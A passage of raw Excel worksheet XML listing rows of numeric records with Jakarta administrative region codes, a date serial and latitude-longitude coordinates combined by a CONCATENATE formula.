      <c r="E945" t="s">
        <v>23</v>
      </c>
      <c r="F945" t="s">
        <v>3644</v>
      </c>
      <c r="H945" t="s">
        <v>26</v>
      </c>
      <c r="I945" t="s">
        <v>511</v>
      </c>
      <c r="J945" t="s">
        <v>2384</v>
      </c>
      <c r="L945" t="s">
        <v>3645</v>
      </c>
      <c r="M945">
        <v>3172090006</v>
      </c>
      <c r="N945">
        <v>3172090</v>
      </c>
      <c r="O945">
        <v>3172</v>
      </c>
      <c r="P945">
        <v>31</v>
      </c>
      <c r="Q945" t="s">
        <v>2283</v>
      </c>
      <c r="R945" t="s">
        <v>890</v>
      </c>
      <c r="S945" t="s">
        <v>49</v>
      </c>
      <c r="T945" t="s">
        <v>33</v>
      </c>
      <c r="U945" s="5">
        <v>10688131</v>
      </c>
      <c r="V945" s="5" t="s">
        <v>15330</v>
      </c>
      <c r="W945" s="5">
        <v>-617823</v>
      </c>
      <c r="X945" t="s">
        <v>19124</v>
      </c>
      <c r="Y945" t="str">
        <f t="shared" si="14"/>
        <v>-6.17823,106.88131</v>
      </c>
    </row>
    <row r="946" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A946">
        <v>108516</v>
      </c>
      <c r="B946" s="1">
        <v>43884</v>
      </c>
      <c r="C946">
        <v>0</v>
      </c>
      <c r="D946" t="s">
        <v>22</v>
      </c>
      <c r="E946" t="s">
        <v>23</v>
      </c>
      <c r="F946" t="s">
        <v>3646</v>
      </c>
      <c r="G946" t="s">
        <v>3647</v>
      </c>
      <c r="H946" t="s">
        <v>26</v>
      </c>
      <c r="I946" t="s">
        <v>3648</v>
      </c>
      <c r="J946" t="s">
        <v>3235</v>
      </c>
      <c r="L946" t="s">
        <v>3649</v>
      </c>
      <c r="M946">
        <v>3172070001</v>
      </c>
      <c r="N946">
        <v>3172070</v>
      </c>
      <c r="O946">
        <v>3172</v>
      </c>
      <c r="P946">
        <v>31</v>
      </c>
      <c r="Q946" t="s">
        <v>127</v>
      </c>
      <c r="R946" t="s">
        <v>128</v>
      </c>
      <c r="S946" t="s">
        <v>49</v>
      </c>
      <c r="T946" t="s">
        <v>33</v>
      </c>
      <c r="U946" s="5">
        <v>10690123</v>
      </c>
      <c r="V946" s="5" t="s">
        <v>15331</v>
      </c>
      <c r="W946" s="5">
        <v>-623532</v>
      </c>
      <c r="X946" t="s">
        <v>19125</v>
      </c>
      <c r="Y946" t="str">
        <f t="shared" si="14"/>
        <v>-6.23532,106.90123</v>
      </c>
    </row>
    <row r="947" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A947">
        <v>108517</v>
      </c>
      <c r="B947" s="1">
        <v>43884</v>
      </c>
      <c r="C947">
        <v>0</v>
      </c>
      <c r="D947" t="s">
        <v>22</v>
      </c>
      <c r="E947" t="s">
        <v>23</v>
      </c>
      <c r="F947" t="s">
        <v>3650</v>
      </c>
      <c r="G947" t="s">
        <v>3651</v>
      </c>
      <c r="H947" t="s">
        <v>26</v>
      </c>
      <c r="I947" t="s">
        <v>3652</v>
      </c>
      <c r="J947" t="s">
        <v>2276</v>
      </c>
      <c r="M947">
        <v>3175060001</v>
      </c>
      <c r="N947">
        <v>3175060</v>
      </c>
      <c r="O947">
        <v>3175</v>
      </c>
      <c r="P947">
        <v>31</v>
      </c>
      <c r="Q947" t="s">
        <v>2278</v>
      </c>
      <c r="R947" t="s">
        <v>2279</v>
      </c>
      <c r="S947" t="s">
        <v>547</v>
      </c>
      <c r="T947" t="s">
        <v>33</v>
      </c>
      <c r="U947" s="5">
        <v>10692550</v>
      </c>
      <c r="V947" s="5" t="s">
        <v>15332</v>
      </c>
      <c r="W947" s="5">
        <v>-615844</v>
      </c>
      <c r="X947" t="s">
        <v>19126</v>
      </c>
      <c r="Y947" t="str">
        <f t="shared" si="14"/>
        <v>-6.15844,106.92550</v>
      </c>
    </row>
    <row r="948" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A948">
        <v>108518</v>
      </c>
      <c r="B948" s="1">
        <v>43884</v>
      </c>
      <c r="C948">
        <v>0</v>
      </c>
      <c r="D948" t="s">
        <v>22</v>
      </c>
      <c r="E948" t="s">
        <v>23</v>
      </c>
      <c r="F948" t="s">
        <v>3653</v>
      </c>
      <c r="G948" t="s">
        <v>3654</v>
      </c>
      <c r="H948" t="s">
        <v>26</v>
      </c>
      <c r="I948" t="s">
        <v>1862</v>
      </c>
      <c r="J948" t="s">
        <v>3655</v>
      </c>
      <c r="L948" t="s">
        <v>3656</v>
      </c>
      <c r="M948">
        <v>3172080002</v>
      </c>
      <c r="N948">
        <v>3172080</v>
      </c>
      <c r="O948">
        <v>3172</v>
      </c>
      <c r="P948">
        <v>31</v>
      </c>
      <c r="Q948" t="s">
        <v>2804</v>
      </c>
      <c r="R948" t="s">
        <v>141</v>
      </c>
      <c r="S948" t="s">
        <v>49</v>
      </c>
      <c r="T948" t="s">
        <v>33</v>
      </c>
      <c r="U948" s="5">
        <v>10693864</v>
      </c>
      <c r="V948" s="5" t="s">
        <v>15333</v>
      </c>
      <c r="W948" s="5">
        <v>-619744</v>
      </c>
      <c r="X948" t="s">
        <v>19127</v>
      </c>
      <c r="Y948" t="str">
        <f t="shared" si="14"/>
        <v>-6.19744,106.93864</v>
      </c>
    </row>
    <row r="949" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A949">
        <v>108519</v>
      </c>
      <c r="B949" s="1">
        <v>43884</v>
      </c>
      <c r="C949">
        <v>0</v>
      </c>
      <c r="D949" t="s">
        <v>22</v>
      </c>
      <c r="E949" t="s">
        <v>23</v>
      </c>
      <c r="F949" t="s">
        <v>3657</v>
      </c>
      <c r="H949" t="s">
        <v>26</v>
      </c>
      <c r="I949" t="s">
        <v>1538</v>
      </c>
      <c r="J949" t="s">
        <v>3658</v>
      </c>
      <c r="L949" t="s">
        <v>3659</v>
      </c>
      <c r="M949">
        <v>3175050002</v>
      </c>
      <c r="N949">
        <v>3175050</v>
      </c>
      <c r="O949">
        <v>3175</v>
      </c>
      <c r="P949">
        <v>31</v>
      </c>
      <c r="Q949" t="s">
        <v>1012</v>
      </c>
      <c r="R949" t="s">
        <v>1013</v>
      </c>
      <c r="S949" t="s">
        <v>547</v>
      </c>
      <c r="T949" t="s">
        <v>33</v>
      </c>
      <c r="U949" s="5">
        <v>10691042</v>
      </c>
      <c r="V949" s="5" t="s">
        <v>15334</v>
      </c>
      <c r="W949" s="5">
        <v>-616961</v>
      </c>
      <c r="X949" t="s">
        <v>19128</v>
      </c>
      <c r="Y949" t="str">
        <f t="shared" si="14"/>
        <v>-6.16961,106.91042</v>
      </c>
    </row>
    <row r="950" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A950">
        <v>108520</v>
      </c>
      <c r="B950" s="1">
        <v>43884</v>
      </c>
      <c r="C950">
        <v>0</v>
      </c>
      <c r="D950" t="s">
        <v>22</v>
      </c>
      <c r="E950" t="s">
        <v>23</v>
      </c>
      <c r="F950" t="s">
        <v>3660</v>
      </c>
      <c r="H950" t="s">
        <v>26</v>
      </c>
      <c r="I950" t="s">
        <v>2962</v>
      </c>
      <c r="J950" t="s">
        <v>3581</v>
      </c>
      <c r="L950" t="s">
        <v>3661</v>
      </c>
      <c r="M950">
        <v>3173040001</v>
      </c>
      <c r="N950">
        <v>3173040</v>
      </c>
      <c r="O950">
        <v>3173</v>
      </c>
      <c r="P950">
        <v>31</v>
      </c>
      <c r="Q950" t="s">
        <v>1598</v>
      </c>
      <c r="R950" t="s">
        <v>1598</v>
      </c>
      <c r="S950" t="s">
        <v>62</v>
      </c>
      <c r="T950" t="s">
        <v>33</v>
      </c>
      <c r="U950" s="5">
        <v>10685598</v>
      </c>
      <c r="V950" s="5" t="s">
        <v>15335</v>
      </c>
      <c r="W950" s="5">
        <v>-618536</v>
      </c>
      <c r="X950" t="s">
        <v>19129</v>
      </c>
      <c r="Y950" t="str">
        <f t="shared" si="14"/>
        <v>-6.18536,106.85598</v>
      </c>
    </row>
    <row r="951" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A951">
        <v>108521</v>
      </c>
      <c r="B951" s="1">
        <v>43884</v>
      </c>
      <c r="C951">
        <v>0</v>
      </c>
      <c r="D951" t="s">
        <v>22</v>
      </c>
      <c r="E951" t="s">
        <v>23</v>
      </c>
      <c r="F951" t="s">
        <v>3662</v>
      </c>
      <c r="G951" t="s">
        <v>3663</v>
      </c>
      <c r="H951" t="s">
        <v>26</v>
      </c>
      <c r="I951" t="s">
        <v>753</v>
      </c>
      <c r="J951" t="s">
        <v>3664</v>
      </c>
      <c r="L951" t="s">
        <v>3665</v>
      </c>
      <c r="M951">
        <v>3172080003</v>
      </c>
      <c r="N951">
        <v>3172080</v>
      </c>
      <c r="O951">
        <v>3172</v>
      </c>
      <c r="P951">
        <v>31</v>
      </c>
      <c r="Q951" t="s">
        <v>2250</v>
      </c>
      <c r="R951" t="s">
        <v>141</v>
      </c>
      <c r="S951" t="s">
        <v>49</v>
      </c>
      <c r="T951" t="s">
        <v>33</v>
      </c>
      <c r="U951" s="5">
        <v>10694011</v>
      </c>
      <c r="V951" s="5" t="s">
        <v>15336</v>
      </c>
      <c r="W951" s="5">
        <v>-619724</v>
      </c>
      <c r="X951" t="s">
        <v>19130</v>
      </c>
      <c r="Y951" t="str">
        <f t="shared" si="14"/>
        <v>-6.19724,106.94011</v>
      </c>
    </row>
    <row r="952" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A952">
        <v>108522</v>
      </c>
      <c r="B952" s="1">
        <v>43884</v>
      </c>
      <c r="C952">
        <v>0</v>
      </c>
      <c r="D952" t="s">
        <v>22</v>
      </c>
      <c r="E952" t="s">
        <v>23</v>
      </c>
      <c r="F952" t="s">
        <v>3666</v>
      </c>
      <c r="G952" t="s">
        <v>3667</v>
      </c>
      <c r="H952" t="s">
        <v>26</v>
      </c>
      <c r="I952" t="s">
        <v>3668</v>
      </c>
      <c r="J952" t="s">
        <v>1590</v>
      </c>
      <c r="M952">
        <v>3175030002</v>
      </c>
      <c r="N952">
        <v>3175030</v>
      </c>
      <c r="O952">
        <v>3175</v>
      </c>
      <c r="P952">
        <v>31</v>
      </c>
      <c r="Q952" t="s">
        <v>1592</v>
      </c>
      <c r="R952" t="s">
        <v>1563</v>
      </c>
      <c r="S952" t="s">
        <v>547</v>
      </c>
      <c r="T952" t="s">
        <v>33</v>
      </c>
      <c r="U952" s="5">
        <v>10688311</v>
      </c>
      <c r="V952" s="5" t="s">
        <v>15337</v>
      </c>
      <c r="W952" s="5">
        <v>-615700</v>
      </c>
      <c r="X952" t="s">
        <v>19131</v>
      </c>
      <c r="Y952" t="str">
        <f t="shared" si="14"/>
        <v>-6.15700,106.88311</v>
      </c>
    </row>
    <row r="953" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A953">
        <v>108523</v>
      </c>
      <c r="B953" s="1">
        <v>43884</v>
      </c>
      <c r="C953">
        <v>0</v>
      </c>
      <c r="D953" t="s">
        <v>22</v>
      </c>
      <c r="E953" t="s">
        <v>23</v>
      </c>
      <c r="F953" t="s">
        <v>3669</v>
      </c>
      <c r="G953" t="s">
        <v>3670</v>
      </c>
      <c r="H953" t="s">
        <v>26</v>
      </c>
      <c r="I953" t="s">
        <v>27</v>
      </c>
      <c r="J953" t="s">
        <v>3671</v>
      </c>
      <c r="M953">
        <v>3175050002</v>
      </c>
      <c r="N953">
        <v>3175050</v>
      </c>
      <c r="O953">
        <v>3175</v>
      </c>
      <c r="P953">
        <v>31</v>
      </c>
      <c r="Q953" t="s">
        <v>1012</v>
      </c>
      <c r="R953" t="s">
        <v>1013</v>
      </c>
      <c r="S953" t="s">
        <v>547</v>
      </c>
      <c r="T953" t="s">
        <v>33</v>
      </c>
      <c r="U953" s="5">
        <v>10690434</v>
      </c>
      <c r="V953" s="5" t="s">
        <v>15338</v>
      </c>
      <c r="W953" s="5">
        <v>-617744</v>
      </c>
      <c r="X953" t="s">
        <v>19132</v>
      </c>
      <c r="Y953" t="str">
        <f t="shared" si="14"/>
        <v>-6.17744,106.90434</v>
      </c>
    </row>
    <row r="954" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A954">
        <v>108524</v>
      </c>
      <c r="B954" s="1">
        <v>43884</v>
      </c>
      <c r="C954">
        <v>0</v>
      </c>
      <c r="D954" t="s">
        <v>22</v>
      </c>
      <c r="E954" t="s">
        <v>23</v>
      </c>
      <c r="F954" t="s">
        <v>3672</v>
      </c>
      <c r="G954" t="s">
        <v>3673</v>
      </c>
      <c r="H954" t="s">
        <v>26</v>
      </c>
      <c r="I954" t="s">
        <v>974</v>
      </c>
      <c r="J954" t="s">
        <v>3212</v>
      </c>
      <c r="M954">
        <v>3173050003</v>
      </c>
      <c r="N954">
        <v>3173050</v>
      </c>
      <c r="O954">
        <v>3173</v>
      </c>
      <c r="P954">
        <v>31</v>
      </c>
      <c r="Q954" t="s">
        <v>2333</v>
      </c>
      <c r="R954" t="s">
        <v>589</v>
      </c>
      <c r="S954" t="s">
        <v>62</v>
      </c>
      <c r="T954" t="s">
        <v>33</v>
      </c>
      <c r="U954" s="5">
        <v>10686570</v>
      </c>
      <c r="V954" s="5" t="s">
        <v>15339</v>
      </c>
      <c r="W954" s="5">
        <v>-618253</v>
      </c>
      <c r="X954" t="s">
        <v>19133</v>
      </c>
      <c r="Y954" t="str">
        <f t="shared" si="14"/>
        <v>-6.18253,106.86570</v>
      </c>
    </row>
    <row r="955" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A955">
        <v>108525</v>
      </c>
      <c r="B955" s="1">
        <v>43884</v>
      </c>
      <c r="C955">
        <v>0</v>
      </c>
      <c r="D955" t="s">
        <v>22</v>
      </c>
      <c r="E955" t="s">
        <v>23</v>
      </c>
      <c r="F955" t="s">
        <v>3674</v>
      </c>
      <c r="H955" t="s">
        <v>26</v>
      </c>
      <c r="I955" t="s">
        <v>2196</v>
      </c>
      <c r="J955" t="s">
        <v>3675</v>
      </c>
      <c r="L955" t="s">
        <v>3676</v>
      </c>
      <c r="M955">
        <v>3171080003</v>
      </c>
      <c r="N955">
        <v>3171080</v>
      </c>
      <c r="O955">
        <v>3171</v>
      </c>
      <c r="P955">
        <v>31</v>
      </c>
      <c r="Q955" t="s">
        <v>3677</v>
      </c>
      <c r="R955" t="s">
        <v>1403</v>
      </c>
      <c r="S955" t="s">
        <v>108</v>
      </c>
      <c r="T955" t="s">
        <v>33</v>
      </c>
      <c r="U955" s="5">
        <v>10682748</v>
      </c>
      <c r="V955" s="5" t="s">
        <v>15340</v>
      </c>
      <c r="W955" s="5">
        <v>-626023</v>
      </c>
      <c r="X955" t="s">
        <v>19134</v>
      </c>
      <c r="Y955" t="str">
        <f t="shared" si="14"/>
        <v>-6.26023,106.82748</v>
      </c>
    </row>
    <row r="956" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A956">
        <v>108526</v>
      </c>
      <c r="B956" s="1">
        <v>43884</v>
      </c>
      <c r="C956">
        <v>0</v>
      </c>
      <c r="D956" t="s">
        <v>22</v>
      </c>
      <c r="E956" t="s">
        <v>23</v>
      </c>
      <c r="F956" t="s">
        <v>3678</v>
      </c>
      <c r="G956" t="s">
        <v>3679</v>
      </c>
      <c r="H956" t="s">
        <v>26</v>
      </c>
      <c r="I956" t="s">
        <v>1201</v>
      </c>
      <c r="J956" t="s">
        <v>3072</v>
      </c>
      <c r="L956" t="s">
        <v>3680</v>
      </c>
      <c r="M956">
        <v>3172080003</v>
      </c>
      <c r="N956">
        <v>3172080</v>
      </c>
      <c r="O956">
        <v>3172</v>
      </c>
      <c r="P956">
        <v>31</v>
      </c>
      <c r="Q956" t="s">
        <v>2250</v>
      </c>
      <c r="R956" t="s">
        <v>141</v>
      </c>
      <c r="S956" t="s">
        <v>49</v>
      </c>
      <c r="T956" t="s">
        <v>33</v>
      </c>
      <c r="U956" s="5">
        <v>10694880</v>
      </c>
      <c r="V956" s="5" t="s">
        <v>15251</v>
      </c>
      <c r="W956" s="5">
        <v>-619689</v>
      </c>
      <c r="X956" t="s">
        <v>19050</v>
      </c>
      <c r="Y956" t="str">
        <f t="shared" si="14"/>
        <v>-6.19689,106.94880</v>
      </c>
    </row>
    <row r="957" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A957">
        <v>108527</v>
      </c>
      <c r="B957" s="1">
        <v>43884</v>
      </c>
      <c r="C957">
        <v>0</v>
      </c>
      <c r="D957" t="s">
        <v>22</v>
      </c>
      <c r="E957" t="s">
        <v>23</v>
      </c>
      <c r="F957" t="s">
        <v>3681</v>
      </c>
      <c r="G957" t="s">
        <v>3682</v>
      </c>
      <c r="H957" t="s">
        <v>26</v>
      </c>
      <c r="I957" t="s">
        <v>882</v>
      </c>
      <c r="J957" t="s">
        <v>2916</v>
      </c>
      <c r="L957" t="s">
        <v>3683</v>
      </c>
      <c r="M957">
        <v>3172040003</v>
      </c>
      <c r="N957">
        <v>3172040</v>
      </c>
      <c r="O957">
        <v>3172</v>
      </c>
      <c r="P957">
        <v>31</v>
      </c>
      <c r="Q957" t="s">
        <v>552</v>
      </c>
      <c r="R957" t="s">
        <v>281</v>
      </c>
      <c r="S957" t="s">
        <v>49</v>
      </c>
      <c r="T957" t="s">
        <v>33</v>
      </c>
      <c r="U957" s="5">
        <v>10688060</v>
      </c>
      <c r="V957" s="5" t="s">
        <v>15341</v>
      </c>
      <c r="W957" s="5">
        <v>-626479</v>
      </c>
      <c r="X957" t="s">
        <v>19135</v>
      </c>
      <c r="Y957" t="str">
        <f t="shared" si="14"/>
        <v>-6.26479,106.88060</v>
      </c>
    </row>
    <row r="958" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A958">
        <v>108528</v>
      </c>
      <c r="B958" s="1">
        <v>43884</v>
      </c>
      <c r="C958">
        <v>0</v>
      </c>
      <c r="D958" t="s">
        <v>22</v>
      </c>
      <c r="E958" t="s">
        <v>23</v>
      </c>
      <c r="F958" t="s">
        <v>3684</v>
      </c>
      <c r="G958" t="s">
        <v>3685</v>
      </c>
      <c r="H958" t="s">
        <v>26</v>
      </c>
      <c r="I958" t="s">
        <v>166</v>
      </c>
      <c r="J958" t="s">
        <v>3686</v>
      </c>
      <c r="L958" t="s">
        <v>3687</v>
      </c>
      <c r="M958">
        <v>3172040002</v>
      </c>
      <c r="N958">
        <v>3172040</v>
      </c>
      <c r="O958">
        <v>3172</v>
      </c>
      <c r="P958">
        <v>31</v>
      </c>
      <c r="Q958" t="s">
        <v>281</v>
      </c>
      <c r="R958" t="s">
        <v>281</v>
      </c>
      <c r="S958" t="s">
        <v>49</v>
      </c>
      <c r="T958" t="s">
        <v>33</v>
      </c>
      <c r="U958" s="5">
        <v>10687847</v>
      </c>
      <c r="V958" s="5" t="s">
        <v>15342</v>
      </c>
      <c r="W958" s="5">
        <v>-627651</v>
      </c>
      <c r="X958" t="s">
        <v>19136</v>
      </c>
      <c r="Y958" t="str">
        <f t="shared" si="14"/>
        <v>-6.27651,106.87847</v>
      </c>
    </row>
    <row r="959" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A959">
        <v>108529</v>
      </c>
      <c r="B959" s="1">
        <v>43884</v>
      </c>
      <c r="C959">
        <v>0</v>
      </c>
      <c r="D959" t="s">
        <v>22</v>
      </c>
      <c r="E959" t="s">
        <v>23</v>
      </c>
      <c r="F959" t="s">
        <v>3688</v>
      </c>
      <c r="G959" t="s">
        <v>3689</v>
      </c>
      <c r="H959" t="s">
        <v>26</v>
      </c>
      <c r="I959" t="s">
        <v>3690</v>
      </c>
      <c r="J959" t="s">
        <v>2194</v>
      </c>
      <c r="M959">
        <v>3175050002</v>
      </c>
      <c r="N959">
        <v>3175050</v>
      </c>
      <c r="O959">
        <v>3175</v>
      </c>
      <c r="P959">
        <v>31</v>
      </c>
      <c r="Q959" t="s">
        <v>1012</v>
      </c>
      <c r="R959" t="s">
        <v>1013</v>
      </c>
      <c r="S959" t="s">
        <v>547</v>
      </c>
      <c r="T959" t="s">
        <v>33</v>
      </c>
      <c r="U959" s="5">
        <v>10690467</v>
      </c>
      <c r="V959" s="5" t="s">
        <v>15343</v>
      </c>
      <c r="W959" s="5">
        <v>-617305</v>
      </c>
      <c r="X959" t="s">
        <v>19137</v>
      </c>
      <c r="Y959" t="str">
        <f t="shared" si="14"/>
        <v>-6.17305,106.90467</v>
      </c>
    </row>
    <row r="960" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A960">
        <v>108530</v>
      </c>
      <c r="B960" s="1">
        <v>43884</v>
      </c>
      <c r="C960">
        <v>0</v>
      </c>
      <c r="D960" t="s">
        <v>22</v>
      </c>
      <c r="E960" t="s">
        <v>23</v>
      </c>
      <c r="F960" t="s">
        <v>3691</v>
      </c>
      <c r="G960" t="s">
        <v>3692</v>
      </c>
      <c r="H960" t="s">
        <v>26</v>
      </c>
      <c r="I960" t="s">
        <v>166</v>
      </c>
      <c r="J960" t="s">
        <v>3693</v>
      </c>
      <c r="M960">
        <v>3175050003</v>
      </c>
      <c r="N960">
        <v>3175050</v>
      </c>
      <c r="O960">
        <v>3175</v>
      </c>
      <c r="P960">
        <v>31</v>
      </c>
      <c r="Q960" t="s">
        <v>1740</v>
      </c>
      <c r="R960" t="s">
        <v>1013</v>
      </c>
      <c r="S960" t="s">
        <v>547</v>
      </c>
      <c r="T960" t="s">
        <v>33</v>
      </c>
      <c r="U960" s="5">
        <v>10691302</v>
      </c>
      <c r="V960" s="5" t="s">
        <v>15344</v>
      </c>
      <c r="W960" s="5">
        <v>-616915</v>
      </c>
      <c r="X960" t="s">
        <v>18811</v>
      </c>
      <c r="Y960" t="str">
        <f t="shared" si="14"/>
        <v>-6.16915,106.91302</v>
      </c>
    </row>
    <row r="961" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A961">
        <v>108531</v>
      </c>
      <c r="B961" s="1">
        <v>43884</v>
      </c>
      <c r="C961">
        <v>0</v>
      </c>
      <c r="D961" t="s">
        <v>22</v>
      </c>
      <c r="E961" t="s">
        <v>23</v>
      </c>
      <c r="F961" t="s">
        <v>3694</v>
      </c>
      <c r="H961" t="s">
        <v>26</v>
      </c>
      <c r="I961" t="s">
        <v>3695</v>
      </c>
      <c r="J961" t="s">
        <v>1010</v>
      </c>
      <c r="L961" t="s">
        <v>3696</v>
      </c>
      <c r="M961">
        <v>3175050002</v>
      </c>
      <c r="N961">
        <v>3175050</v>
      </c>
      <c r="O961">
        <v>3175</v>
      </c>
      <c r="P961">
        <v>31</v>
      </c>
      <c r="Q961" t="s">
        <v>1012</v>
      </c>
      <c r="R961" t="s">
        <v>1013</v>
      </c>
      <c r="S961" t="s">
        <v>547</v>
      </c>
      <c r="T961" t="s">
        <v>33</v>
      </c>
      <c r="U961" s="5">
        <v>10690365</v>
      </c>
      <c r="V961" s="5" t="s">
        <v>15345</v>
      </c>
      <c r="W961" s="5">
        <v>-616978</v>
      </c>
      <c r="X961" t="s">
        <v>18266</v>
      </c>
      <c r="Y961" t="str">
        <f t="shared" si="14"/>
        <v>-6.16978,106.90365</v>
      </c>
    </row>
    <row r="962" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A962">
        <v>108532</v>
      </c>
      <c r="B962" s="1">
        <v>43884</v>
      </c>
      <c r="C962">
        <v>0</v>
      </c>
      <c r="D962" t="s">
        <v>22</v>
      </c>
      <c r="E962" t="s">
        <v>23</v>
      </c>
      <c r="F962" t="s">
        <v>3697</v>
      </c>
      <c r="G962" t="s">
        <v>3698</v>
      </c>
      <c r="H962" t="s">
        <v>26</v>
      </c>
      <c r="I962" t="s">
        <v>2165</v>
      </c>
      <c r="J962" t="s">
        <v>3699</v>
      </c>
      <c r="L962" t="s">
        <v>3700</v>
      </c>
      <c r="M962">
        <v>3175050003</v>
      </c>
      <c r="N962">
        <v>3175050</v>
      </c>
      <c r="O962">
        <v>3175</v>
      </c>
      <c r="P962">
        <v>31</v>
      </c>
      <c r="Q962" t="s">
        <v>1740</v>
      </c>
      <c r="R962" t="s">
        <v>1013</v>
      </c>
      <c r="S962" t="s">
        <v>547</v>
      </c>
      <c r="T962" t="s">
        <v>33</v>
      </c>
      <c r="U962" s="5">
        <v>10691348</v>
      </c>
      <c r="V962" s="5" t="s">
        <v>15346</v>
      </c>
      <c r="W962" s="5">
        <v>-614832</v>
      </c>
      <c r="X962" t="s">
        <v>19138</v>
      </c>
      <c r="Y962" t="str">
        <f t="shared" si="14"/>
        <v>-6.14832,106.91348</v>
      </c>
    </row>
    <row r="963" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A963">
        <v>108533</v>
      </c>
      <c r="B963" s="1">
        <v>43884</v>
      </c>
      <c r="C963">
        <v>0</v>
      </c>
      <c r="D963" t="s">
        <v>22</v>
      </c>
      <c r="E963" t="s">
        <v>23</v>
      </c>
      <c r="F963" t="s">
        <v>3701</v>
      </c>
      <c r="G963" t="s">
        <v>3702</v>
      </c>
      <c r="H963" t="s">
        <v>26</v>
      </c>
      <c r="I963" t="s">
        <v>27</v>
      </c>
      <c r="J963" t="s">
        <v>2916</v>
      </c>
      <c r="M963">
        <v>3172040003</v>
      </c>
      <c r="N963">
        <v>3172040</v>
      </c>
      <c r="O963">
        <v>3172</v>
      </c>
      <c r="P963">
        <v>31</v>
      </c>
      <c r="Q963" t="s">
        <v>552</v>
      </c>
      <c r="R963" t="s">
        <v>281</v>
      </c>
      <c r="S963" t="s">
        <v>49</v>
      </c>
      <c r="T963" t="s">
        <v>33</v>
      </c>
      <c r="U963" s="5">
        <v>10688006</v>
      </c>
      <c r="V963" s="5" t="s">
        <v>15347</v>
      </c>
      <c r="W963" s="5">
        <v>-626428</v>
      </c>
      <c r="X963" t="s">
        <v>19139</v>
      </c>
      <c r="Y963" t="str">
        <f t="shared" ref="Y963:Y1026" si="15">CONCATENATE(X963,",",V963)</f>
        <v>-6.26428,106.88006</v>
      </c>
    </row>
    <row r="964" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A964">
        <v>108534</v>
      </c>
      <c r="B964" s="1">
        <v>43884</v>
      </c>
      <c r="C964">
        <v>0</v>
      </c>
      <c r="D964" t="s">
        <v>22</v>
      </c>
      <c r="E964" t="s">
        <v>23</v>
      </c>
      <c r="F964" t="s">
        <v>3703</v>
      </c>
      <c r="H964" t="s">
        <v>26</v>
      </c>
      <c r="I964" t="s">
        <v>3704</v>
      </c>
      <c r="J964" t="s">
        <v>3705</v>
      </c>
      <c r="L964" t="s">
        <v>3706</v>
      </c>
      <c r="M964">
        <v>3172080005</v>
      </c>
      <c r="N964">
        <v>3172080</v>
      </c>
      <c r="O964">
        <v>3172</v>
      </c>
      <c r="P964">
        <v>31</v>
      </c>
      <c r="Q964" t="s">
        <v>140</v>
      </c>
      <c r="R964" t="s">
        <v>141</v>
      </c>
      <c r="S964" t="s">
        <v>49</v>
      </c>
      <c r="T964" t="s">
        <v>33</v>
      </c>
      <c r="U964" s="5">
        <v>10694165</v>
      </c>
      <c r="V964" s="5" t="s">
        <v>15348</v>
      </c>
      <c r="W964" s="5">
        <v>-616296</v>
      </c>
      <c r="X964" t="s">
        <v>19140</v>
      </c>
      <c r="Y964" t="str">
        <f t="shared" si="15"/>
        <v>-6.16296,106.94165</v>
      </c>
    </row>
    <row r="965" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A965">
        <v>108535</v>
      </c>
      <c r="B965" s="1">
        <v>43884</v>
      </c>
      <c r="C965">
        <v>0</v>
      </c>
      <c r="D965" t="s">
        <v>22</v>
      </c>
      <c r="E965" t="s">
        <v>23</v>
      </c>
      <c r="F965" t="s">
        <v>3707</v>
      </c>
      <c r="G965" t="s">
        <v>3708</v>
      </c>
      <c r="H965" t="s">
        <v>26</v>
      </c>
      <c r="I965" t="s">
        <v>277</v>
      </c>
      <c r="J965" t="s">
        <v>3709</v>
      </c>
      <c r="L965" t="s">
        <v>3710</v>
      </c>
      <c r="M965">
        <v>3172080006</v>
      </c>
      <c r="N965">
        <v>3172080</v>
      </c>
      <c r="O965">
        <v>3172</v>
      </c>
      <c r="P965">
        <v>31</v>
      </c>
      <c r="Q965" t="s">
        <v>2853</v>
      </c>
      <c r="R965" t="s">
        <v>141</v>
      </c>
      <c r="S965" t="s">
        <v>49</v>
      </c>
      <c r="T965" t="s">
        <v>33</v>
      </c>
      <c r="U965" s="5">
        <v>10693077</v>
      </c>
      <c r="V965" s="5" t="s">
        <v>15349</v>
      </c>
      <c r="W965" s="5">
        <v>-618237</v>
      </c>
      <c r="X965" t="s">
        <v>19141</v>
      </c>
      <c r="Y965" t="str">
        <f t="shared" si="15"/>
        <v>-6.18237,106.93077</v>
      </c>
    </row>
    <row r="966" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A966">
        <v>108536</v>
      </c>
      <c r="B966" s="1">
        <v>43884</v>
      </c>
      <c r="C966">
        <v>0</v>
      </c>
      <c r="D966" t="s">
        <v>22</v>
      </c>
      <c r="E966" t="s">
        <v>23</v>
      </c>
      <c r="F966" t="s">
        <v>3711</v>
      </c>
      <c r="G966" t="s">
        <v>3712</v>
      </c>
      <c r="H966" t="s">
        <v>26</v>
      </c>
      <c r="I966" t="s">
        <v>137</v>
      </c>
      <c r="J966" t="s">
        <v>3713</v>
      </c>
      <c r="M966">
        <v>3175050002</v>
      </c>
      <c r="N966">
        <v>3175050</v>
      </c>
      <c r="O966">
        <v>3175</v>
      </c>
      <c r="P966">
        <v>31</v>
      </c>
      <c r="Q966" t="s">
        <v>1012</v>
      </c>
      <c r="R966" t="s">
        <v>1013</v>
      </c>
      <c r="S966" t="s">
        <v>547</v>
      </c>
      <c r="T966" t="s">
        <v>33</v>
      </c>
      <c r="U966" s="5">
        <v>10690118</v>
      </c>
      <c r="V966" s="5" t="s">
        <v>15350</v>
      </c>
      <c r="W966" s="5">
